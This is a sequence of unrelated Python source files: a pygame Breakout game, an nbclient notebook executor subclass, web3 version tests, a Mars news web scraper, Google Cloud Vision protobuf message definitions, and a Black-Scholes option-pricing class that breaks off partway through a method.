self.bricks, self.number_unbreakable_bricks = LevelGenerator().create_level(self.player.current_level)
def check_ball_collisions(self):
"""
description:
- Checks all possible collisions that can occur for the ball.
- Bounce off at left, right and top edge.
- Bounce off from paddle using paddle.hitzones' vectors.
- Check for brick collision and delegate handling.
- Check if player dropped the ball.
- if decremented to 0 --> game over --> save score --> restart
:return:
"""
# collision left or right edge
if self.ball.form.x <= 0 or self.ball.form.x >= DISPLAY_WIDTH:
self.ball.collide_vertical()
if self.ball.form.x <= 0:
self.ball.form.x = 1
else:
self.ball.form.x = DISPLAY_WIDTH - 1
# collision top edge
if self.ball.form.y <= 0:
self.ball.form.y = 1
self.ball.collide_horizontal()
        # collision with paddle
for paddle_part in self.paddle.hitzones:
if paddle_part[0].colliderect(self.ball.form):
self.ball.vector = paddle_part[1]
break
# brick collisions
collision_bricks = []
for brick in self.bricks:
if brick.rect.colliderect(self.ball.form):
collision_bricks.append(brick)
if len(collision_bricks) > 0:
self.handle_brick_collisions(collision_bricks)
# collision bottom edge --> lost
if self.ball.form.y > DISPLAY_HEIGHT:
self.player.lives -= 1
if self.player.lives == 0:
highscore(self.screen, self.player.score)
self.player.set_lives()
self.player.score = 0
self.player.current_level = 1
self.start_game()
else:
self.reset_ball()
def check_previously_horizontally_outside(self, brick_rect, horizontal_movement):
"""
description:
        - Check whether the ball had no horizontal overlap with the currently hit brick in the previous frame.
- Aligned edges do not count as overlap.
:param brick_rect: pygame.Rect-Object representing the hit brick's position.
:param horizontal_movement: Movement-Enum value indicating left or right movement
:return: true if no overlap, false otherwise
"""
ball_pos_previous = self.ball.get_previous_position()
ball_rect_previous = pygame.Rect(ball_pos_previous[0], ball_pos_previous[1], self.ball.form.width,
self.ball.form.height)
if horizontal_movement == Movement.RIGHT:
return ball_rect_previous.right <= brick_rect.left
else:
return ball_rect_previous.left >= brick_rect.right
def check_previously_vertically_outside(self, brick_rect, vertical_movement):
"""
description:
        - Check whether the ball had no vertical overlap with the currently hit brick in the previous frame.
- Aligned edges do not count as overlap.
:param brick_rect: pygame.Rect-Object representing the hit brick's position.
:param vertical_movement: Movement-Enum value indicating up or down movement
:return: true if no overlap, false otherwise
"""
ball_pos_previous = self.ball.get_previous_position()
ball_rect_previous = pygame.Rect(ball_pos_previous[0], ball_pos_previous[1], self.ball.form.width,
self.ball.form.height)
if vertical_movement == Movement.DOWN:
return ball_rect_previous.bottom <= brick_rect.top
else:
return ball_rect_previous.top >= brick_rect.bottom
def handle_brick_collisions(self, collision_bricks):
"""
description:
- Handle the brick-collision based on the number of bricks hit.
- If only one brick was hit: Call function to perform brick collision with determined collision type
- More than one (basically working with the first 2,
edge-case of more than 2 ignored due to unlikelihood and complexity):
- Determine expected collision type based on the relative position of the 2 bricks.
- Determine calculated collision type for 2 bricks.
- Perform brick collision with the brick matching the expected collision type.
- If none matches: chose one (irrelevant for user experience) to perform the brick collision with using
expected collision type.
:param collision_bricks: list of Brick-objects hit by the ball
:return: nothing
"""
if len(collision_bricks) == 1:
self.perform_brick_collision(collision_bricks[0], self.determine_collision_type(collision_bricks[0]))
else:
if collision_bricks[0].rect.x == collision_bricks[1].rect.x: # above each other
collision_required = CollisionType.VERTICAL
else: # next to each other
collision_required = CollisionType.HORIZONTAL
brick1_collision = self.determine_collision_type(collision_bricks[0])
brick2_collision = self.determine_collision_type(collision_bricks[1])
if brick1_collision == collision_required:
self.perform_brick_collision(collision_bricks[0], brick1_collision)
elif brick2_collision == collision_required:
self.perform_brick_collision(collision_bricks[1], brick2_collision)
else:
self.perform_brick_collision(collision_bricks[0], collision_required)
def determine_collision_type(self, brick_hit):
"""
description:
- Determine the collision type based on the movement and overlap in the previous frame.
:param brick_hit: Brick-object determine the theoretical collision type for.
:return: CollisionType-enum value
"""
horizontal_movement = self.ball.get_horizontal_movement()
vertical_movement = self.ball.get_vertical_movement()
previously_horizontally_outside = self.check_previously_horizontally_outside(brick_hit.rect,
horizontal_movement)
previously_vertically_outside = self.check_previously_vertically_outside(brick_hit.rect, vertical_movement)
# neither horizontal nor vertical overlap in the previous frame
# --> compare ratio of horizontal and vertical overlap in the current frame
if previously_horizontally_outside and previously_vertically_outside:
horizontal_delta = (self.ball.form.right - brick_hit.rect.left) if horizontal_movement == Movement.RIGHT \
else (brick_hit.rect.right - self.ball.form.left)
vertical_delta = (self.ball.form.bottom - brick_hit.rect.top) if vertical_movement == Movement.DOWN \
else (brick_hit.rect.bottom - self.ball.form.top)
if horizontal_delta > vertical_delta:
return CollisionType.HORIZONTAL
else:
return CollisionType.VERTICAL
# horizontal overlap but no vertical overlap in the previous frame --> vertical collision
elif previously_horizontally_outside and not previously_vertically_outside:
return CollisionType.VERTICAL
# no horizontal overlap but vertical overlap in the previous frame --> horizontal collision
elif not previously_horizontally_outside and previously_vertically_outside:
return CollisionType.HORIZONTAL
# horizontal overlap and vertical overlap in the previous frame
        # --> irrelevant here because the collision would have already happened and been handled in the previous frame.
def perform_brick_collision(self, brick_hit, collision_type):
"""
description:
- Call function to change ball's movement direction based on the collision_type.
- Call Brick's get_hit() function.
- Destroy brick, increase score if brick was destroyed and create a special with a certain probability.
:param brick_hit: Brick-object to perform the collision with
:param collision_type: CollisionType-Enum
:return: nothing
"""
if collision_type == CollisionType.HORIZONTAL:
self.ball.collide_horizontal()
else:
self.ball.collide_vertical()
if brick_hit.get_hit():
self.bricks.remove(brick_hit)
self.player.score += 1
if to_drop_special():
spcl = choose_random_special()
txt = spcl.get_german_name()
self.spcl_text = SpecialText(txt, self.clock_speed)
self.present_specials.append(Special(brick_hit.rect.topleft, spcl))
def check_special_collisions(self):
"""
description:
- Check if any specials, i.e. special.rect, currently present on the screen is caught with the paddle.
- To be caught the special has to be completely within the paddle's horizontal width and the paddle's
height.
- Remove active special if new special is caught.
- Activate special on self or paddle based on its type.
- Remove the special from the currently present specials and set self.active special.
- If special is off screen, remove it.
:return: nothing
"""
if len(self.present_specials) > 0:
for special in self.present_specials:
if (self.paddle.get_top_edge() < special.rect.bottom <= self.paddle.get_bottom_edge()) \
and self.paddle.get_left_edge() <= special.rect.left \
and self.paddle.get_right_edge() >= special.rect.right:
if not (self.active_special is None):
self.remove_special()
if special.is_paddle_special():
self.paddle.activate_special(special)
else:
self.activate_special(special)
self.present_specials.remove(special)
self.active_special = special
self.active_special.activate(self.clock_speed)
elif special.rect.top > DISPLAY_HEIGHT:
self.present_specials.remove(special)
def activate_special(self, special):
"""
description:
- Activate a caught non-paddle special.
- Either add a bonus life or adjust clock speed based on special.type
:param special: the caught special
:return: nothing
"""
if special.special_type == SpecialType.BONUS_LIFE:
self.player.lives += 1
elif special.special_type == SpecialType.FASTER:
self.clock_speed = DEFAULT_CLOCK_SPEED * CLOCK_SPEED_CHANGE_FACTOR
elif special.special_type == SpecialType.SLOWER:
self.clock_speed = DEFAULT_CLOCK_SPEED / CLOCK_SPEED_CHANGE_FACTOR
def remove_special(self):
"""
description:
- Remove the currently active special and negate its effect.
            - If is_paddle_special: remove special from paddle
- else: reset self.clock_speed
:return: nothing
"""
if self.active_special.is_paddle_special():
self.paddle.remove_special()
else:
self.clock_speed = DEFAULT_CLOCK_SPEED
self.active_special = None
def draw_all(self):
"""
description:
- Called every tick
- draws screen with every element
:return:
"""
self.screen.fill(BLUE)
for brick in self.bricks:
brick.show_brick(self.screen)
for paddle_part in self.paddle.hitzones:
pygame.draw.rect(self.screen, WHITE, paddle_part[0])
for triangle in self.paddle.triangle_views:
pygame.draw.polygon(self.screen, WHITE, triangle)
for special in self.present_specials:
special.fall()
special.show_special(self.screen)
self.player.draw_lives(self.screen)
pygame.draw.rect(self.screen, WHITE, self.ball.form)
self.screen.blit(self.font.render(str(self.player.score), -1, WHITE), (400, 550))
self.draw_spcl_txt()
def draw_spcl_txt(self):
"""
description:
- Write the type of the special that just dropped to the top of the screen.
:return: nothing
"""
if self.spcl_text is not None:
info = TextElement(
center_position=(590, 10),
font_size=16,
bg_rgb=BLUE,
text_rgb=WHITE,
text=f"Spezial: {self.spcl_text.text} aufgetaucht",
)
elems = RenderUpdates(info)
elems.draw(self.screen)
if self.spcl_text.tick():
self.spcl_text = None
def level_completed(self):
"""
description:
- Called when the player completes a level.
- If level 10 was completed: show Highscore Page
- Else: increase level, add bonus life
:return:
"""
if self.player.current_level == 10:
highscore(self.screen, self.player.score)
return GameState.TITLE
else:
self.player.current_level += 1
self.player.lives += 1
self.start_game()
def pause_elems(self):
"""
description:
- Creates the Text object when being in pause mode
:return: elements to be drawn during pause mode
"""
dbi = DatabaseInteract()
sets = dbi.get_settings()
heading = TextElement(
center_position=(400, 400),
font_size=18,
bg_rgb=BLUE,
text_rgb=WHITE,
text=f"Spiel Pausiert, zum Fortsetzen '{sets[5]}' drücken, zum Beenden 'ESC' drücken ",
)
elems = RenderUpdates(heading)
return elems
def draw_start_text(self):
"""
description:
- Creates and draws the Text object when being in pause mode
:return: nothing
"""
dbi = DatabaseInteract()
sets = dbi.get_settings()
key_left = sets[1]
key_right = sets[3]
key_shoot = sets[8]
heading1 = TextElement(
center_position=(400, 400),
font_size=18,
bg_rgb=BLUE,
text_rgb=WHITE,
text=f"Startwinkel mit '{key_left}' und '{key_right}' auswählen",
)
heading2 = TextElement(
center_position=(400, 450),
font_size=18,
bg_rgb=BLUE,
text_rgb=WHITE,
text=f"Mit '{key_shoot}' Ball abschiessen, zum Beenden 'ESC' drücken ",
)
elems = RenderUpdates(heading1,heading2)
elems.draw(self.screen)
def main(self):
"""
description:
- Contains game logic.
- Process game events by calling corresponding functions.
- Update the UI.
- Check whether level was completed.
:return: nothing
"""
clock = pygame.time.Clock()
self.start_game()
dbi = DatabaseInteract()
sets = dbi.get_settings()
key_left = sets[2]
key_right = sets[4]
pause_key = sets[6]
while True:
clock.tick(self.clock_speed)
for event in pygame.event.get():
if event.type == QUIT:
os._exit(1)
if event.type == pygame.KEYDOWN:
if event.key == int(pause_key):
elems = self.pause_elems()
game_paused = True
while game_paused:
elems.draw(self.screen)
events = pygame.event.get()
for event in events:
if event.type == QUIT:
os._exit(1)
if event.type == pygame.KEYDOWN:
if event.key == int(pause_key):
game_paused = False
break
elif event.key == pygame.K_ESCAPE:
return GameState.TITLE
pygame.display.update()
keys = pygame.key.get_pressed()
if keys[int(key_left)]:
self.paddle.move(-1)
if keys[int(key_right)]:
self.paddle.move(1)
if keys[pygame.K_ESCAPE]:
return GameState.TITLE
# update ball
self.ball.move()
self.check_ball_collisions()
# update specials
if not (self.active_special is None):
if self.active_special.tick():
self.remove_special()
self.check_special_collisions()
# Update screen
self.draw_all()
pygame.display.flip()
if len(self.bricks) == self.number_unbreakable_bricks:
if self.level_completed() == GameState.TITLE:
return GameState.TITLE
|
the-stack_0_12299 | import asyncio
import typing as t
from contextlib import asynccontextmanager
from nbclient import NotebookClient
from nbformat import NotebookNode
from nbclient.exceptions import CellExecutionComplete, DeadKernelError, CellControlSignal
from nbclient.util import run_hook
from appyter.ext.asyncio.event_loop import get_event_loop
from appyter.ext.asyncio.helpers import ensure_async
class NotebookClientIOPubHook(NotebookClient):
''' A notebook client with the ability to hook into iopub updates
'''
def __init__(self, *args, iopub_hook=None, **kwargs):
super().__init__(*args, **kwargs)
self.iopub_hook = iopub_hook
async def _async_poll_output_msg(
self,
parent_msg_id,
cell,
cell_index
):
assert self.kc is not None
complete = False
while not complete:
msg = await ensure_async(self.kc.iopub_channel.get_msg(timeout=None))
if msg['parent_header'].get('msg_id') == parent_msg_id:
try:
# Will raise CellExecutionComplete when completed
self.process_message(msg, cell, cell_index)
except CellExecutionComplete:
complete = True
finally:
if self.iopub_hook is not None:
await self.iopub_hook(cell, cell_index)
def _kc_execute(self, *args, **kwargs):
return self.kc.execute(*args, **kwargs)
async def async_execute_cell(
self,
cell: NotebookNode,
cell_index: int,
execution_count: t.Optional[int] = None,
store_history: bool = True) -> NotebookNode:
"""
Executes a single code cell.
To execute all cells see :meth:`execute`.
Parameters
----------
cell : nbformat.NotebookNode
The cell which is currently being processed.
cell_index : int
The position of the cell within the notebook object.
execution_count : int
The execution count to be assigned to the cell (default: Use kernel response)
store_history : bool
Determines if history should be stored in the kernel (default: False).
Specific to ipython kernels, which can store command histories.
Returns
-------
output : dict
The execution output payload (or None for no output).
Raises
------
CellExecutionError
If execution failed and should raise an exception, this will be raised
with defaults about the failure.
Returns
-------
cell : NotebookNode
The cell which was just processed.
"""
assert self.kc is not None
if cell.cell_type != 'code' or not cell.source.strip():
self.log.debug("Skipping non-executing cell %s", cell_index)
return cell
if self.record_timing and 'execution' not in cell['metadata']:
cell['metadata']['execution'] = {}
self.log.debug("Executing cell:\n%s", cell.source)
parent_msg_id = await ensure_async(self._kc_execute)(
cell.source,
store_history=store_history,
stop_on_error=not self.allow_errors
)
# We launched a code cell to execute
self.code_cells_executed += 1
exec_timeout = self._get_timeout(cell)
cell.outputs = []
self.clear_before_next_output = False
task_poll_kernel_alive = asyncio.ensure_future(
self._async_poll_kernel_alive()
)
task_poll_output_msg = asyncio.ensure_future(
self._async_poll_output_msg(parent_msg_id, cell, cell_index)
)
self.task_poll_for_reply = asyncio.ensure_future(
self._async_poll_for_reply(
parent_msg_id, cell, exec_timeout, task_poll_output_msg, task_poll_kernel_alive
)
)
try:
exec_reply = await self.task_poll_for_reply
except asyncio.CancelledError:
# can only be cancelled by task_poll_kernel_alive when the kernel is dead
task_poll_output_msg.cancel()
raise DeadKernelError("Kernel died")
except Exception as e:
# Best effort to cancel request if it hasn't been resolved
try:
# Check if the task_poll_output is doing the raising for us
if not isinstance(e, CellControlSignal):
task_poll_output_msg.cancel()
finally:
raise
if execution_count:
cell['execution_count'] = execution_count
await self._check_raise_for_error(cell, cell_index, exec_reply)
self.nb['cells'][cell_index] = cell
return cell
@asynccontextmanager
async def async_setup_kernel(self, **kwargs) -> t.AsyncGenerator:
"""
Context manager for setting up the kernel to execute a notebook.
This assigns the Kernel Manager (``self.km``) if missing and Kernel Client(``self.kc``).
When control returns from the yield it stops the client's zmq channels, and shuts
down the kernel.
"""
# by default, cleanup the kernel client if we own the kernel manager
# and keep it alive if we don't
cleanup_kc = kwargs.pop('cleanup_kc', self.owns_km)
if self.km is None:
self.km = self.create_kernel_manager()
loop = get_event_loop()
if not self.km.has_kernel:
await self.async_start_new_kernel(**kwargs)
await self.async_start_new_kernel_client()
try:
yield
except RuntimeError as e:
await run_hook(self.on_notebook_error, notebook=self.nb)
raise e
finally:
if cleanup_kc:
await self._async_cleanup_kernel()
await run_hook(self.on_notebook_complete, notebook=self.nb)
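# Illustrative sketch (added example, not part of the original module): wire an
# iopub hook that reports per-cell progress while a notebook executes. The
# notebook filename and kernel name below are assumptions.
def _example_execute_with_progress(path='example.ipynb', kernel_name='python3'):
  import nbformat
  async def report_progress(cell, cell_index):
    print(f"cell {cell_index}: {len(cell.get('outputs', []))} output(s) so far")
  nb = nbformat.read(path, as_version=4)
  client = NotebookClientIOPubHook(nb, kernel_name=kernel_name, iopub_hook=report_progress)
  return client.execute()  # runs the notebook, invoking the hook on iopub updates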
|
the-stack_0_12300 | import pytest
from newchain_web3 import (
EthereumTesterProvider,
Web3,
)
from newchain_web3.providers.eth_tester.main import (
AsyncEthereumTesterProvider,
)
from newchain_web3.version import (
AsyncVersion,
BlockingVersion,
Version,
)
@pytest.fixture
def blocking_w3():
return Web3(
EthereumTesterProvider(),
modules={
'blocking_version': BlockingVersion,
'legacy_version': Version
})
@pytest.fixture
def async_w3():
return Web3(
AsyncEthereumTesterProvider(),
middlewares=[],
modules={
'async_version': AsyncVersion,
})
def test_blocking_version(blocking_w3):
assert blocking_w3.blocking_version.api == blocking_w3.legacy_version.api
assert blocking_w3.blocking_version.node == blocking_w3.legacy_version.node
assert blocking_w3.blocking_version.ethereum == blocking_w3.legacy_version.ethereum
@pytest.mark.asyncio
async def test_async_blocking_version(async_w3, blocking_w3):
assert async_w3.async_version.api == blocking_w3.legacy_version.api
assert await async_w3.async_version.node == blocking_w3.legacy_version.node
with pytest.raises(
ValueError,
message="RPC Endpoint has not been implemented: eth_protocolVersion"
):
assert await async_w3.async_version.ethereum == blocking_w3.legacy_version.ethereum
|
the-stack_0_12301 | #imports
from splinter import Browser
from bs4 import BeautifulSoup as soup
from webdriver_manager.chrome import ChromeDriverManager
import datetime as dt
#scrape all function
def scrape_all():
# need to return a json that has data to load into database (MongoDB)
# Set up Splinter
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
    # get data from news page and add variables for news title and paragraph
news_title, news_paragraph = scrape_news(browser)
# then add info to dictionary
marsData = {
"newsTitle": news_title,
"newsParagraph": news_paragraph,
"featuredImage": scrape_images(browser),
"facts": scrape_facts(browser),
"hemispheres": scrape_hemisphere_pages(browser),
"lastUpdated": dt.datetime.now()
}
#stop webdriver
browser.quit()
return marsData
#scrape the mars news page
def scrape_news(browser):
# Visit the Mars news site
url = 'https://redplanetscience.com/'
browser.visit(url)
# Optional delay for loading the page
browser.is_element_present_by_css('div.list_text', wait_time=1)
# Convert the browser html to a soup object
html = browser.html
news_soup = soup(html, 'html.parser')
slide_elem = news_soup.select_one('div.list_text')
#get title
news_title = slide_elem.find('div', class_='content_title').get_text()
#get paragraph
news_p= slide_elem.find('div', class_='article_teaser_body').get_text()
#return title and para
return news_title, news_p
#scrape through the feature image page
def scrape_images(browser):
    # visit images page
featured_image_url = 'https://spaceimages-mars.com'
browser.visit(featured_image_url)
# Find and click the full image button
full_image_link = browser.find_by_tag('button')[1]
full_image_link.click()
#parsing through with soup
html = browser.html
img_soup = soup(html, 'html.parser')
#locating mars image
img_url_rel = img_soup.find('img', class_='fancybox-image').get('src')
# Use the base url to create an absolute url
img_url = f'https://spaceimages-mars.com/{img_url_rel}'
return img_url
#scrape through facts page to get table
#grabbing the html code
def scrape_facts(browser):
facts_url = 'https://galaxyfacts-mars.com/'
browser.visit(facts_url)
html = browser.html
fact_soup = soup(html, 'html.parser')
#locating facts
facts_loc = fact_soup.find('div', class_="diagram mt-4")
fact_table = facts_loc.find('table') #getting html for fact table
facts = ""
#add text to facts
facts += str(fact_table)
return facts
#scrape hemisphere pages
def scrape_hemisphere_pages(browser):
hemi_url = 'https://marshemispheres.com/'
browser.visit(hemi_url)
# Create a list to hold the images and titles.
hemisphere_image_urls = []
# Get a list of all of the hemispheres
#links = browser.find_by_css('a.product-item img')
# Next, loop through those links, click the link, find the sample anchor, return the href
for i in range(4):
#make a dictionary for hemisphere
hemisphereInfo = {}
# We have to find the elements on each loop to avoid a stale element exception
browser.find_by_css('a.product-item img')[i].click()
# Next, we find the Sample image anchor tag and extract the href
sample = browser.links.find_by_text('Sample').first
hemisphereInfo["img_url"] = sample['href']
# Get Hemisphere title
hemisphereInfo['title'] = browser.find_by_css('h2.title').text
# Append hemisphere object to list
hemisphere_image_urls.append(hemisphereInfo)
# Finally, we navigate backwards
browser.back()
return hemisphere_image_urls
#run script
if __name__ == "__main__":
print(scrape_all()) |
the-stack_0_12303 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.vision.v1p2beta1", manifest={"WebDetection",},
)
class WebDetection(proto.Message):
r"""Relevant information for the image from the Internet.
Attributes:
web_entities (Sequence[~.web_detection.WebDetection.WebEntity]):
Deduced entities from similar images on the
Internet.
full_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Fully matching images from the Internet.
Can include resized copies of the query image.
partial_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Partial matching images from the Internet.
Those images are similar enough to share some
key-point features. For example an original
image will likely have partial matching for its
crops.
pages_with_matching_images (Sequence[~.web_detection.WebDetection.WebPage]):
Web pages containing the matching images from
the Internet.
visually_similar_images (Sequence[~.web_detection.WebDetection.WebImage]):
The visually similar image results.
best_guess_labels (Sequence[~.web_detection.WebDetection.WebLabel]):
Best guess text labels for the request image.
"""
class WebEntity(proto.Message):
r"""Entity deduced from similar images on the Internet.
Attributes:
entity_id (str):
Opaque entity ID.
score (float):
Overall relevancy score for the entity.
Not normalized and not comparable across
different image queries.
description (str):
Canonical description of the entity, in
English.
"""
entity_id = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
description = proto.Field(proto.STRING, number=3)
class WebImage(proto.Message):
r"""Metadata for online images.
Attributes:
url (str):
The result image URL.
score (float):
(Deprecated) Overall relevancy score for the
image.
"""
url = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
class WebPage(proto.Message):
r"""Metadata for web pages.
Attributes:
url (str):
The result web page URL.
score (float):
(Deprecated) Overall relevancy score for the
web page.
page_title (str):
Title for the web page, may contain HTML
markups.
full_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Fully matching images on the page.
Can include resized copies of the query image.
partial_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Partial matching images on the page.
Those images are similar enough to share some
key-point features. For example an original
image will likely have partial matching for its
crops.
"""
url = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
page_title = proto.Field(proto.STRING, number=3)
full_matching_images = proto.RepeatedField(
proto.MESSAGE, number=4, message="WebDetection.WebImage",
)
partial_matching_images = proto.RepeatedField(
proto.MESSAGE, number=5, message="WebDetection.WebImage",
)
class WebLabel(proto.Message):
r"""Label to provide extra metadata for the web detection.
Attributes:
label (str):
Label for extra metadata.
language_code (str):
The BCP-47 language code for ``label``, such as "en-US" or
"sr-Latn". For more information, see
http://www.unicode.org/reports/tr35/#Unicode_locale_identifier.
"""
label = proto.Field(proto.STRING, number=1)
language_code = proto.Field(proto.STRING, number=2)
web_entities = proto.RepeatedField(proto.MESSAGE, number=1, message=WebEntity,)
full_matching_images = proto.RepeatedField(
proto.MESSAGE, number=2, message=WebImage,
)
partial_matching_images = proto.RepeatedField(
proto.MESSAGE, number=3, message=WebImage,
)
pages_with_matching_images = proto.RepeatedField(
proto.MESSAGE, number=4, message=WebPage,
)
visually_similar_images = proto.RepeatedField(
proto.MESSAGE, number=6, message=WebImage,
)
best_guess_labels = proto.RepeatedField(proto.MESSAGE, number=8, message=WebLabel,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
the-stack_0_12304 | import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
import time
import bspline
import bspline.splinelab as splinelab
# The Black-Scholes prices
def bs_put(t, S0, K, r, sigma, T):
d1 = (np.log(S0 / K) + (r + 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
d2 = (np.log(S0 / K) + (r - 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
price = K * np.exp(-r * (T - t)) * norm.cdf(-d2) - S0 * norm.cdf(-d1)
return price
def bs_call(t, S0, K, r, sigma, T):
d1 = (np.log(S0 / K) + (r + 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
d2 = (np.log(S0 / K) + (r - 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
price = S0 * norm.cdf(d1) - K * np.exp(-r * (T - t)) * norm.cdf(d2)
return price
def d1(S0, K, r, sigma, T):
return (np.log(S0 / K) + (r + sigma ** 2 / 2) * T) / (sigma * np.sqrt(T))
def d2(S0, K, r, sigma, T):
return (np.log(S0 / K) + (r - sigma ** 2 / 2) * T) / (sigma * np.sqrt(T))
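# Illustrative sanity check (added example, not part of the original script):
# European put-call parity, C - P = S0 - K * exp(-r * (T - t)), should hold for
# the closed-form prices above. The default parameter values are arbitrary.
def put_call_parity_gap(t=0.0, S0=100.0, K=95.0, r=0.05, sigma=0.2, T=1.0):
    lhs = bs_call(t, S0, K, r, sigma, T) - bs_put(t, S0, K, r, sigma, T)
    rhs = S0 - K * np.exp(-r * (T - t))
    return lhs - rhs  # expected to be ~0 up to floating-point error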
class DiscreteBlackScholes:
"""
Class implementing discrete Black Scholes
DiscreteBlackScholes is class for pricing and hedging under
the real-world measure for a one-dimensional Black-Scholes setting
"""
def __init__(self,
s0,
strike,
vol,
T,
r,
mu,
numSteps,
numPaths):
"""
:param s0: initial price of the underlying
:param strike: option strike
:param vol: volatility
:param T: time to maturity, in years
:param r: risk-free rate,
:param mu: real drift, asset drift
:param numSteps: number of time steps
:param numPaths: number of Monte Carlo paths
"""
self.s0 = s0
self.strike = strike
self.vol = vol
self.T = T
self.r = r
self.mu = mu
self.numSteps = numSteps
self.numPaths = numPaths
self.dt = self.T / self.numSteps # time step
self.gamma = np.exp(-r * self.dt) # discount factor for one time step, i.e. gamma in the QLBS paper
self.sVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of stock values
# initialize half of the paths with stock price values ranging from 0.5 to 1.5 of s0
# the other half of the paths start with s0
half_paths = int(numPaths / 2)
if False:
# Grau (2010) "Applications of Least-Squares Regressions to Pricing and Hedging of Financial Derivatives"
self.sVals[:, 0] = (np.hstack((np.linspace(0.5 * s0, 1.5 * s0, half_paths),
s0 * np.ones(half_paths, 'float')))).T
self.sVals[:, 0] = s0 * np.ones(numPaths, 'float')
self.optionVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of option values
self.intrinsicVals = np.zeros((self.numPaths, self.numSteps + 1), 'float')
self.bVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of cash position values
self.opt_hedge = np.zeros((self.numPaths, self.numSteps + 1),
'float') # matrix of optimal hedges calculated from cross-sectional information F_t
self.X = None
self.data = None # matrix of features, i.e. self.X as sum of basis functions
self.delta_S_hat = None
# coef = 1.0/(2 * gamma * risk_lambda)
# override it by zero to have pure risk hedge
self.coef = 0.
def gen_paths(self):
"""
        A simple geometric Brownian motion path generator
"""
np.random.seed(42)
# Spline basis of order p on knots k
z = np.random.normal(0, 1, size=(self.numSteps + 1, self.numPaths)).T
for t in range(self.numSteps):
self.sVals[:, t + 1] = self.sVals[:, t] * np.exp(
(self.mu - 0.5 * self.vol ** 2) * self.dt + (self.vol * np.sqrt(self.dt) * z[:, t + 1]))
print(self.sVals)
# like in QLBS
delta_S = self.sVals[:, 1:] - np.exp(self.r * self.dt) * self.sVals[:, :self.numSteps]
self.delta_S_hat = np.apply_along_axis(lambda x: x - np.mean(x), axis=0, arr=delta_S)
# state variable
# delta_t here is due to their conventions
self.X = - (self.mu - 0.5 * self.vol ** 2) * np.arange(self.numSteps + 1) * self.dt + np.log(self.sVals)
X_min = np.min(np.min(self.X))
X_max = np.max(np.max(self.X))
print('X.shape = ', self.X.shape)
print('X_min, X_max = ', X_min, X_max)
p = 4 # order of spline (as-is; 3 = cubic, 4: B-spline?)
ncolloc = 12
tau = np.linspace(X_min, X_max, ncolloc) # These are the sites to which we would like to interpolate
# k is a knot vector that adds endpoints repeats as appropriate for a spline of order p
# To get meaningful results, one should have ncolloc >= p+1
k = splinelab.aptknt(tau, p)
basis = bspline.Bspline(k, p)
num_basis = ncolloc # len(k) #
self.data = np.zeros((self.numSteps + 1, self.numPaths, num_basis))
print('num_basis = ', num_basis)
print('dim self.data = ', self.data.shape)
# fill it, expand function in finite dimensional space
# in neural network the basis is the neural network itself
t_0 = time.time()
for ix in np.arange(self.numSteps + 1):
x = self.X[:, ix]
self.data[ix, :, :] = np.array([basis(el) for el in x])
t_end = time.time()
print('\nTime Cost of basis expansion:', t_end - t_0, 'seconds')
def function_A_vec(self, t, reg_param=1e-3):
"""
function_A_vec - compute the matrix A_{nm} from Eq. (52) (with a regularization!)
Eq. (52) in QLBS Q-Learner in the Black-Scholes-Merton article
Arguments:
t - time index, a scalar, an index into time axis of data_mat
reg_param - a scalar, regularization parameter
Return:
- np.array, i.e. matrix A_{nm} of dimension num_basis x num_basis
"""
X_mat = self.data[t, :, :]
num_basis_funcs = X_mat.shape[1]
this_dS = self.delta_S_hat[:, t]
hat_dS2 = (this_dS ** 2).reshape(-1, 1)
A_mat = np.dot(X_mat.T, X_mat * hat_dS2) + reg_param * np.eye(num_basis_funcs)
return A_mat
def function_B_vec(self, t, Pi_hat):
"""
function_B_vec - compute vector B_{n} from Eq. (52) QLBS Q-Learner in the Black-Scholes-Merton article
Arguments:
t - time index, a scalar, an index into time axis of delta_S_hat
Pi_hat - pandas.DataFrame of dimension N_MC x T of portfolio values
Return:
B_vec - np.array() of dimension num_basis x 1
"""
tmp = Pi_hat * self.delta_S_hat[:, t] + self.coef * (np.exp((self.mu - self.r) * self.dt)) * self.sVals[:, t]
X_mat = self.data[t, :, :] # matrix of dimension N_MC x num_basis
B_vec = np.dot(X_mat.T, tmp)
return B_vec
def seed_intrinsic(self, strike=None, cp='P'):
"""
        initialize option value and intrinsic value for each node
"""
if strike is not None:
self.strike = strike
if cp == 'P':
# payoff function at maturity T: max(K - S(T),0) for all paths
self.optionVals = np.maximum(self.strike - self.sVals[:, -1], 0).copy()
# payoff function for all paths, at all time slices
self.intrinsicVals = np.maximum(self.strike - self.sVals, 0).copy()
elif cp == 'C':
# payoff function at maturity T: max(S(T) -K,0) for all paths
self.optionVals = np.maximum(self.sVals[:, -1] - self.strike, 0).copy()
# payoff function for all paths, at all time slices
self.intrinsicVals = np.maximum(self.sVals - self.strike, 0).copy()
else:
raise Exception('Invalid parameter: %s' % cp)
self.bVals[:, -1] = self.intrinsicVals[:, -1]
def roll_backward(self):
"""
Roll the price and optimal hedge back in time starting from maturity
"""
for t in range(self.numSteps - 1, -1, -1):
